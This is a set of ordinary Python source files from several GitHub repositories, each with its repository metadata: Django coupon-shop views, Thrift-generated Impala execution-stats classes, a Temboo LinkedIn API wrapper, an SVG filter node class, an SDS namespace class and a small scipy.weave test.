    organization, shop = getShop(user)
    if not shop:
        return HttpResponseRedirect('/sorry/')
    if request.method == 'POST':
        shop.title = request.POST.get('title', '')
        shop.location = request.POST.get('location', '')
        shop.save()
        return HttpResponseRedirect('/company/')
    return render(request, 'shop/company.html', {'user': user,
                                                 'shop': shop})
'''
def create_coupon(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login/')
else:
user=request.user
try:
#organization=Organization.objects.get(user=user)
organization, shop=getShop(user)
if request.method=='POST':
form = CouponForm(request.POST)
if form.is_valid():
new_coupon = form.save(commit=False)
new_coupon.shop=shop
new_coupon.save()
return HttpResponseRedirect('/my_coupons/')
else:
form = CouponForm()
return render(request, 'shop/create_coupon.html', {'form':form, 'shop':shop})
except ObjectDoesNotExist:
return HttpResponseRedirect('/sorry/')
'''
def my_coupons(request, city_name=CITY):
    """List the shop's coupons; on POST, delete the selected coupon."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect('/login/')
    user = request.user
    organization, shop = getShop(user)
    if not organization:
        return HttpResponseRedirect('/sorry/')
    list_of_coupons = Coupon.objects.filter(shop=shop)
    number = len(list_of_coupons)
    id_delete = request.GET.get('delete', '')
    if request.method == 'POST':
        id_delete = request.POST['id_delete']
        Coupon.objects.get(pk=id_delete).delete()
        return HttpResponseRedirect('/shop/my_coupons/')
    return render(request, 'shop/my_coupons.html',
                  {'list_of_coupons': list_of_coupons,
                   'number': number,
                   'shop': shop})
def erase(request):
    """Detach a coupon from a player and record it in the coupon history."""
    if not request.user.is_authenticated():
        return HttpResponseRedirect('/login/')
    user = request.user
    organization, shop = getShop(user)
    if request.method == 'GET':
        id_user = request.GET['id_user']
        id_coupon = request.GET['id_coupon']
        coupon = Coupon.objects.get(id=id_coupon)
        player = Player.objects.get(id=id_user)
        player.coupon_set.remove(coupon)
        # Keep an audit trail of the redeemed coupon.
        CouponHistory.objects.create(
            player=player,
            shop=shop.title,
            title=coupon.title,
        )
        player.save()
        coupon.save()
    return HttpResponseRedirect('/my_coupons/')
|
{
"content_hash": "19556c1b4aa729006b9f8d7d52154367",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 121,
"avg_line_length": 35.796875,
"alnum_prop": 0.5986468790920996,
"repo_name": "fraferra/PlayCity",
"id": "3277d9eebc579a96641054d41f3095b27ca9c088",
"size": "4608",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "shop/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "720208"
},
{
"name": "JavaScript",
"bytes": "2228440"
},
{
"name": "Python",
"bytes": "355729"
},
{
"name": "Shell",
"bytes": "169"
}
],
"symlink_target": ""
}
|
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import impala._thrift_gen.Status.ttypes
import impala._thrift_gen.Types.ttypes
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class TExecState(object):
  """Lifecycle states reported for a query execution (thrift enum)."""
  # Assign 0..6 in declaration order, mirroring the thrift enum values.
  REGISTERED, PLANNING, QUEUED, RUNNING, FINISHED, CANCELLED, FAILED = range(7)

  _VALUES_TO_NAMES = {
    0: "REGISTERED",
    1: "PLANNING",
    2: "QUEUED",
    3: "RUNNING",
    4: "FINISHED",
    5: "CANCELLED",
    6: "FAILED",
  }

  _NAMES_TO_VALUES = {
    "REGISTERED": 0,
    "PLANNING": 1,
    "QUEUED": 2,
    "RUNNING": 3,
    "FINISHED": 4,
    "CANCELLED": 5,
    "FAILED": 6,
  }
class TExecStats(object):
  """
  Attributes:
   - latency_ns
   - cpu_time_ns
   - cardinality
   - memory_used
  """

  # Thrift struct metadata, indexed by field id:
  # (field id, wire type, field name, nested type spec, default value).
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'latency_ns', None, None, ), # 1
    (2, TType.I64, 'cpu_time_ns', None, None, ), # 2
    (3, TType.I64, 'cardinality', None, None, ), # 3
    (4, TType.I64, 'memory_used', None, None, ), # 4
  )

  def __init__(self, latency_ns=None, cpu_time_ns=None, cardinality=None, memory_used=None,):
    # All four stats are optional I64 fields; None means "not set" and is
    # skipped entirely by write().
    self.latency_ns = latency_ns
    self.cpu_time_ns = cpu_time_ns
    self.cardinality = cardinality
    self.memory_used = memory_used

  def read(self, iprot):
    """Deserialize this struct from the given thrift input protocol."""
    # Fast path: let the fastbinary C extension decode the whole struct at
    # once when the accelerated binary protocol is in use.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode. Fields with unexpected ids or wire
    # types are skipped, so newer writers stay compatible with this reader.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.latency_ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I64:
          self.cpu_time_ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I64:
          self.cardinality = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I64:
          self.memory_used = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to the given thrift output protocol."""
    # Fast path mirrors read(): encode in C when possible.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Slow path: only fields that are not None are written to the wire.
    oprot.writeStructBegin('TExecStats')
    if self.latency_ns is not None:
      oprot.writeFieldBegin('latency_ns', TType.I64, 1)
      oprot.writeI64(self.latency_ns)
      oprot.writeFieldEnd()
    if self.cpu_time_ns is not None:
      oprot.writeFieldBegin('cpu_time_ns', TType.I64, 2)
      oprot.writeI64(self.cpu_time_ns)
      oprot.writeFieldEnd()
    if self.cardinality is not None:
      oprot.writeFieldBegin('cardinality', TType.I64, 3)
      oprot.writeI64(self.cardinality)
      oprot.writeFieldEnd()
    if self.memory_used is not None:
      oprot.writeFieldBegin('memory_used', TType.I64, 4)
      oprot.writeI64(self.memory_used)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields, so nothing to validate.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    # Structural equality: same class and identical attribute dicts.
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TPlanNodeExecSummary(object):
  """
  Per-plan-node execution summary (thrift-generated code; do not edit by hand).

  Attributes:
   - node_id
   - fragment_id
   - label
   - label_detail
   - num_children
   - estimated_stats
   - exec_stats
   - is_active
   - is_broadcast
  """
  # (field id, wire type, name, type args, default) tuples, indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'node_id', None, None, ), # 1
    (2, TType.I32, 'fragment_id', None, None, ), # 2
    (3, TType.STRING, 'label', None, None, ), # 3
    (4, TType.STRING, 'label_detail', None, None, ), # 4
    (5, TType.I32, 'num_children', None, None, ), # 5
    (6, TType.STRUCT, 'estimated_stats', (TExecStats, TExecStats.thrift_spec), None, ), # 6
    (7, TType.LIST, 'exec_stats', (TType.STRUCT,(TExecStats, TExecStats.thrift_spec)), None, ), # 7
    (8, TType.LIST, 'is_active', (TType.BOOL,None), None, ), # 8
    (9, TType.BOOL, 'is_broadcast', None, None, ), # 9
  )
  def __init__(self, node_id=None, fragment_id=None, label=None, label_detail=None, num_children=None, estimated_stats=None, exec_stats=None, is_active=None, is_broadcast=None,):
    self.node_id = node_id
    self.fragment_id = fragment_id
    self.label = label
    self.label_detail = label_detail
    self.num_children = num_children
    self.estimated_stats = estimated_stats
    self.exec_stats = exec_stats
    self.is_active = is_active
    self.is_broadcast = is_broadcast
  def read(self, iprot):
    # Fast path: C-accelerated decoding when the protocol/transport allow it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: decode field-by-field; unknown or mistyped fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.node_id = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.fragment_id = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.label = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.label_detail = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.I32:
          self.num_children = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.STRUCT:
          self.estimated_stats = TExecStats()
          self.estimated_stats.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 7:
        # list<TExecStats>
        if ftype == TType.LIST:
          self.exec_stats = []
          (_etype3, _size0) = iprot.readListBegin()
          for _i4 in xrange(_size0):
            _elem5 = TExecStats()
            _elem5.read(iprot)
            self.exec_stats.append(_elem5)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 8:
        # list<bool>
        if ftype == TType.LIST:
          self.is_active = []
          (_etype9, _size6) = iprot.readListBegin()
          for _i10 in xrange(_size6):
            _elem11 = iprot.readBool();
            self.is_active.append(_elem11)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 9:
        if ftype == TType.BOOL:
          self.is_broadcast = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPlanNodeExecSummary')
    # Fields are emitted only when set (non-None).
    if self.node_id is not None:
      oprot.writeFieldBegin('node_id', TType.I32, 1)
      oprot.writeI32(self.node_id)
      oprot.writeFieldEnd()
    if self.fragment_id is not None:
      oprot.writeFieldBegin('fragment_id', TType.I32, 2)
      oprot.writeI32(self.fragment_id)
      oprot.writeFieldEnd()
    if self.label is not None:
      oprot.writeFieldBegin('label', TType.STRING, 3)
      oprot.writeString(self.label)
      oprot.writeFieldEnd()
    if self.label_detail is not None:
      oprot.writeFieldBegin('label_detail', TType.STRING, 4)
      oprot.writeString(self.label_detail)
      oprot.writeFieldEnd()
    if self.num_children is not None:
      oprot.writeFieldBegin('num_children', TType.I32, 5)
      oprot.writeI32(self.num_children)
      oprot.writeFieldEnd()
    if self.estimated_stats is not None:
      oprot.writeFieldBegin('estimated_stats', TType.STRUCT, 6)
      self.estimated_stats.write(oprot)
      oprot.writeFieldEnd()
    if self.exec_stats is not None:
      oprot.writeFieldBegin('exec_stats', TType.LIST, 7)
      oprot.writeListBegin(TType.STRUCT, len(self.exec_stats))
      for iter12 in self.exec_stats:
        iter12.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.is_active is not None:
      oprot.writeFieldBegin('is_active', TType.LIST, 8)
      oprot.writeListBegin(TType.BOOL, len(self.is_active))
      for iter13 in self.is_active:
        oprot.writeBool(iter13)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.is_broadcast is not None:
      oprot.writeFieldBegin('is_broadcast', TType.BOOL, 9)
      oprot.writeBool(self.is_broadcast)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Required fields per the thrift IDL.
    if self.node_id is None:
      raise TProtocol.TProtocolException(message='Required field node_id is unset!')
    if self.fragment_id is None:
      raise TProtocol.TProtocolException(message='Required field fragment_id is unset!')
    if self.label is None:
      raise TProtocol.TProtocolException(message='Required field label is unset!')
    if self.num_children is None:
      raise TProtocol.TProtocolException(message='Required field num_children is unset!')
    return
  def __repr__(self):
    # Debug representation listing every attribute (Python 2: ``iteritems``).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TExecSummary(object):
  """
  Whole-query execution summary (thrift-generated code; do not edit by hand).

  Attributes:
   - state
   - status
   - nodes
   - exch_to_sender_map
   - error_logs
  """
  # (field id, wire type, name, type args, default) tuples, indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'state', None, None, ), # 1
    (2, TType.STRUCT, 'status', (impala._thrift_gen.Status.ttypes.TStatus, impala._thrift_gen.Status.ttypes.TStatus.thrift_spec), None, ), # 2
    (3, TType.LIST, 'nodes', (TType.STRUCT,(TPlanNodeExecSummary, TPlanNodeExecSummary.thrift_spec)), None, ), # 3
    (4, TType.MAP, 'exch_to_sender_map', (TType.I32,None,TType.I32,None), None, ), # 4
    (5, TType.LIST, 'error_logs', (TType.STRING,None), None, ), # 5
  )
  def __init__(self, state=None, status=None, nodes=None, exch_to_sender_map=None, error_logs=None,):
    self.state = state
    self.status = status
    self.nodes = nodes
    self.exch_to_sender_map = exch_to_sender_map
    self.error_logs = error_logs
  def read(self, iprot):
    # Fast path: C-accelerated decoding when the protocol/transport allow it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: decode field-by-field; unknown or mistyped fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.state = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.status = impala._thrift_gen.Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        # list<TPlanNodeExecSummary>
        if ftype == TType.LIST:
          self.nodes = []
          (_etype17, _size14) = iprot.readListBegin()
          for _i18 in xrange(_size14):
            _elem19 = TPlanNodeExecSummary()
            _elem19.read(iprot)
            self.nodes.append(_elem19)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 4:
        # map<i32, i32>
        if ftype == TType.MAP:
          self.exch_to_sender_map = {}
          (_ktype21, _vtype22, _size20 ) = iprot.readMapBegin()
          for _i24 in xrange(_size20):
            _key25 = iprot.readI32();
            _val26 = iprot.readI32();
            self.exch_to_sender_map[_key25] = _val26
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 5:
        # list<string>
        if ftype == TType.LIST:
          self.error_logs = []
          (_etype30, _size27) = iprot.readListBegin()
          for _i31 in xrange(_size27):
            _elem32 = iprot.readString();
            self.error_logs.append(_elem32)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TExecSummary')
    # Fields are emitted only when set (non-None).
    if self.state is not None:
      oprot.writeFieldBegin('state', TType.I32, 1)
      oprot.writeI32(self.state)
      oprot.writeFieldEnd()
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 2)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.nodes is not None:
      oprot.writeFieldBegin('nodes', TType.LIST, 3)
      oprot.writeListBegin(TType.STRUCT, len(self.nodes))
      for iter33 in self.nodes:
        iter33.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.exch_to_sender_map is not None:
      oprot.writeFieldBegin('exch_to_sender_map', TType.MAP, 4)
      oprot.writeMapBegin(TType.I32, TType.I32, len(self.exch_to_sender_map))
      for kiter34,viter35 in self.exch_to_sender_map.items():
        oprot.writeI32(kiter34)
        oprot.writeI32(viter35)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.error_logs is not None:
      oprot.writeFieldBegin('error_logs', TType.LIST, 5)
      oprot.writeListBegin(TType.STRING, len(self.error_logs))
      for iter36 in self.error_logs:
        oprot.writeString(iter36)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Only ``state`` is required per the thrift IDL.
    if self.state is None:
      raise TProtocol.TProtocolException(message='Required field state is unset!')
    return
  def __repr__(self):
    # Debug representation listing every attribute (Python 2: ``iteritems``).
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
|
{
"content_hash": "e835a9c8769682e6634ecd8e43134fdd",
"timestamp": "",
"source": "github",
"line_count": 458,
"max_line_length": 188,
"avg_line_length": 33.146288209606986,
"alnum_prop": 0.6131348396021342,
"repo_name": "schaffino/impyla",
"id": "2a194b77aaa875944858870f23168e564481ebca",
"size": "15332",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "impala/_thrift_gen/ExecStats/ttypes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "226216"
},
{
"name": "Shell",
"bytes": "6925"
},
{
"name": "Thrift",
"bytes": "87376"
}
],
"symlink_target": ""
}
|
__author__ = 'sandeep'
class Error(Exception):
    """Base class for all errors raised by this client."""
    pass
class ValidationError(Error):
    """Raised when the caller supplies invalid input."""
    pass
class HTTPError(Error):
    """Raised when the API returns an error response."""
    pass
|
{
"content_hash": "f99037649e23ce6f291be21faf76fde2",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 42,
"avg_line_length": 15.625,
"alnum_prop": 0.616,
"repo_name": "Sandeep4/opinio",
"id": "53e6c2f5929d5f73d5ff515e0a3fec6b40f65ca3",
"size": "250",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "opinio/errors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4947"
}
],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetHistoricalUpdates(Choreography):

    def __init__(self, temboo_session):
        """
        Create a new GetHistoricalUpdates Choreo instance.
        *temboo_session* must be a TembooSession holding valid credentials.
        """
        super(GetHistoricalUpdates, self).__init__(temboo_session, '/Library/LinkedIn/Companies/GetHistoricalUpdates')

    def new_input_set(self):
        """Return a fresh, empty input set for this Choreo."""
        return GetHistoricalUpdatesInputSet()

    def _make_result_set(self, result, path):
        """Wrap a raw execution *result* in this Choreo's result-set type."""
        return GetHistoricalUpdatesResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        """Wrap a running execution in this Choreo's execution type."""
        return GetHistoricalUpdatesChoreographyExecution(session, exec_id, path)
class GetHistoricalUpdatesInputSet(InputSet):
    """
    Input parameters for the GetHistoricalUpdates Choreo. Call the setters
    below to supply values before executing the Choreo.
    """

    def set_APIKey(self, value):
        """(required, string) The API Key provided by LinkedIn (AKA the Client ID)."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('APIKey', value)

    def set_AccessTokenSecret(self, value):
        """(required, string) The Access Token Secret retrieved during the OAuth process (AKA the OAuth User Secret)."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('AccessTokenSecret', value)

    def set_AccessToken(self, value):
        """(required, string) The Access Token retrieved during the OAuth process (AKA the OAuth User Token)."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('AccessToken', value)

    def set_CompanyID(self, value):
        """(required, integer) A LinkedIn assigned ID associated with the company."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('CompanyID', value)

    def set_EndTimestamp(self, value):
        """(optional, date) Timestamp where the stats search should end (milliseconds since epoch); defaults to the current time."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('EndTimestamp', value)

    def set_ResponseFormat(self, value):
        """(optional, string) Response format: xml (the default) or json."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('ResponseFormat', value)

    def set_SecretKey(self, value):
        """(required, string) The Secret Key provided by LinkedIn (AKA the Client Secret)."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('SecretKey', value)

    def set_StartTimestamp(self, value):
        """(required, date) Timestamp where the stats search should begin (milliseconds since epoch)."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('StartTimestamp', value)

    def set_TimeGranularity(self, value):
        """(required, string) Granularity of statistics: day or month."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('TimeGranularity', value)

    def set_UpdateKey(self, value):
        """(optional, string) An update key to return statistics for a specific company update."""
        super(GetHistoricalUpdatesInputSet, self)._set_input('UpdateKey', value)
class GetHistoricalUpdatesResultSet(ResultSet):
    """
    Results returned by the GetHistoricalUpdates Choreo. Use the getters
    below to retrieve outputs after the execution completes.
    """

    def getJSONFromString(self, str):
        """Parse *str* as a JSON document and return the resulting object."""
        return json.loads(str)

    def get_Response(self):
        """Retrieve the "Response" output (the response from LinkedIn)."""
        return self._output.get('Response', None)
class GetHistoricalUpdatesChoreographyExecution(ChoreographyExecution):
    """Tracks a running GetHistoricalUpdates execution."""

    def _make_result_set(self, response, path):
        return GetHistoricalUpdatesResultSet(response, path)
|
{
"content_hash": "8e7af16d78f30f03d408e13054bc5048",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 236,
"avg_line_length": 50.257425742574256,
"alnum_prop": 0.7023246650906225,
"repo_name": "lupyuen/RaspberryPiImage",
"id": "80800c237ae0968e4c6d6c97b694129ce5248b32",
"size": "5984",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "home/pi/GrovePi/Software/Python/others/temboo/Library/LinkedIn/Companies/GetHistoricalUpdates.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "82308"
},
{
"name": "C",
"bytes": "3197439"
},
{
"name": "C#",
"bytes": "33056"
},
{
"name": "C++",
"bytes": "1020255"
},
{
"name": "CSS",
"bytes": "208338"
},
{
"name": "CoffeeScript",
"bytes": "87200"
},
{
"name": "Eagle",
"bytes": "1632170"
},
{
"name": "Go",
"bytes": "3646"
},
{
"name": "Groff",
"bytes": "286691"
},
{
"name": "HTML",
"bytes": "41527"
},
{
"name": "JavaScript",
"bytes": "403603"
},
{
"name": "Makefile",
"bytes": "33808"
},
{
"name": "Objective-C",
"bytes": "69457"
},
{
"name": "Perl",
"bytes": "96047"
},
{
"name": "Processing",
"bytes": "1304"
},
{
"name": "Python",
"bytes": "13358098"
},
{
"name": "Shell",
"bytes": "68795"
},
{
"name": "TeX",
"bytes": "4317"
}
],
"symlink_target": ""
}
|
from RGT.XML.SVG.Filters.baseFilterNode import BaseFilterNode
from types import StringType
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
class FeSpecularLightingNode(BaseFilterNode):
    """SVG <feSpecularLighting> filter-primitive node.

    Exposes accessors for the element's attributes. All setters coerce the
    supplied value to a string before storing; passing None is a no-op.
    The original class repeated the identical coerce-and-store body in five
    setters and the identical lookup body in five getters; both are now
    factored into shared private helpers.
    """
    svgNodeType = BasicSvgNode.SVG_FE_SPECULAR_LIGHTING_NODE

    # Attribute names as they appear in the SVG document.
    ATTRIBUTE_IN = 'in'
    ATTRIBUTE_SURFACE_SCALE = 'surfaceScale'
    ATTRIBUTE_SPECULAR_CONSTANT = 'specularConstant'
    ATTRIBUTE_SPECULAR_EXPONENT = 'specularExponent'
    ATTRIBUTE_KERNEL_UNIT_LENGTH = 'kernelUnitLength'

    def __init__(self, ownerDoc):
        BaseFilterNode.__init__(self, ownerDoc, 'feSpecularLighting')
        self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS, self.SVG_GROUP_LIGHT_SOURCE_ELEMENTS)

    def _setCoercedAttribute(self, attributeName, data):
        # Shared setter body: ignore None, stringify anything else, store.
        if data is not None:
            if type(data) is not StringType:
                data = str(data)
            self._setNodeAttribute(attributeName, data)

    def _getAttributeValue(self, attributeName):
        # Shared getter body: return the attribute's value, or None when unset.
        node = self._getNodeAttribute(attributeName)
        if node is not None:
            return node.nodeValue
        return None

    def setIn(self, data):
        self._setCoercedAttribute(self.ATTRIBUTE_IN, data)

    def setSurfaceScale(self, data):
        self._setCoercedAttribute(self.ATTRIBUTE_SURFACE_SCALE, data)

    def setSpecularConstant(self, data):
        self._setCoercedAttribute(self.ATTRIBUTE_SPECULAR_CONSTANT, data)

    def setSpecularExponent(self, data):
        self._setCoercedAttribute(self.ATTRIBUTE_SPECULAR_EXPONENT, data)

    def setKernelUnitLength(self, data):
        self._setCoercedAttribute(self.ATTRIBUTE_KERNEL_UNIT_LENGTH, data)

    def getIn(self):
        return self._getAttributeValue(self.ATTRIBUTE_IN)

    def getSurfaceScale(self):
        return self._getAttributeValue(self.ATTRIBUTE_SURFACE_SCALE)

    def getSpecularConstant(self):
        return self._getAttributeValue(self.ATTRIBUTE_SPECULAR_CONSTANT)

    def getSpecularExponent(self):
        return self._getAttributeValue(self.ATTRIBUTE_SPECULAR_EXPONENT)

    def getKernelUnitLength(self):
        return self._getAttributeValue(self.ATTRIBUTE_KERNEL_UNIT_LENGTH)
|
{
"content_hash": "29f7452b756c7e186b4720377bc842eb",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 116,
"avg_line_length": 35.666666666666664,
"alnum_prop": 0.6297627606038821,
"repo_name": "danrg/RGT-tool",
"id": "3e2e2e1e1af3a63a322fe232cab1a90d327cb6e4",
"size": "2782",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/RGT/XML/SVG/Filters/feSpecularLightingNode.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "83200"
},
{
"name": "HTML",
"bytes": "93970"
},
{
"name": "JavaScript",
"bytes": "111380"
},
{
"name": "Python",
"bytes": "788710"
},
{
"name": "SQLPL",
"bytes": "722"
}
],
"symlink_target": ""
}
|
import json
class SdsNamespace(object):
    """An SDS namespace, identified solely by its ``Id`` property."""

    @property
    def Id(self):
        return self.__id

    @Id.setter
    def Id(self, id):
        self.__id = id

    def toString(self):
        """Serialize this namespace to a JSON string."""
        return json.dumps(self.toDictionary())

    def toDictionary(self):
        """Return the dict form, containing the required ``Id`` property."""
        return {'Id': self.Id}

    @staticmethod
    def fromString(content):
        """Build an SdsNamespace from a JSON string."""
        return SdsNamespace.fromDictionary(json.loads(content))

    @staticmethod
    def fromDictionary(content):
        """Build an SdsNamespace from a dict; missing keys are left unset."""
        namespace = SdsNamespace()
        if len(content) == 0:
            return namespace
        if "Id" in content:
            namespace.Id = content["Id"]
        return namespace
|
{
"content_hash": "e18ce1210e4884452ce1b540079b1394",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 55,
"avg_line_length": 21.324324324324323,
"alnum_prop": 0.5792141951837769,
"repo_name": "osisoft/Qi-Samples",
"id": "af3e08e7137aff5502b58f30ca47b5037f520cad",
"size": "1384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ocs_samples/library_samples/Python3/ocs_sample_library_preview/SDS/SdsNamespace.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C#",
"bytes": "199449"
},
{
"name": "CSS",
"bytes": "1450"
},
{
"name": "HTML",
"bytes": "14949"
},
{
"name": "Java",
"bytes": "106564"
},
{
"name": "JavaScript",
"bytes": "66956"
},
{
"name": "Python",
"bytes": "265126"
},
{
"name": "TypeScript",
"bytes": "112972"
}
],
"symlink_target": ""
}
|
from numpy import arange
from numpy.testing import TestCase, assert_
from scipy.weave import standard_array_spec
def remove_whitespace(in_str):
    """Return *in_str* with all spaces, tabs and newlines removed."""
    cleaned = in_str
    for ch in (" ", "\t", "\n"):
        cleaned = cleaned.replace(ch, "")
    return cleaned
class TestArrayConverter(TestCase):
    """Tests for ``standard_array_spec.array_converter`` type matching."""

    def test_type_match_string(self):
        converter = standard_array_spec.array_converter()
        assert_(not converter.type_match('string'))

    def test_type_match_int(self):
        converter = standard_array_spec.array_converter()
        assert_(not converter.type_match(5))

    def test_type_match_array(self):
        converter = standard_array_spec.array_converter()
        assert_(converter.type_match(arange(4)))
if __name__ == "__main__":
    # Allow running this test module directly through nose's test runner.
    import nose
    nose.run(argv=['', __file__])
|
{
"content_hash": "e111e2a80a704eece6f35c250af228f6",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 49,
"avg_line_length": 25.333333333333332,
"alnum_prop": 0.6236842105263158,
"repo_name": "lesserwhirls/scipy-cwt",
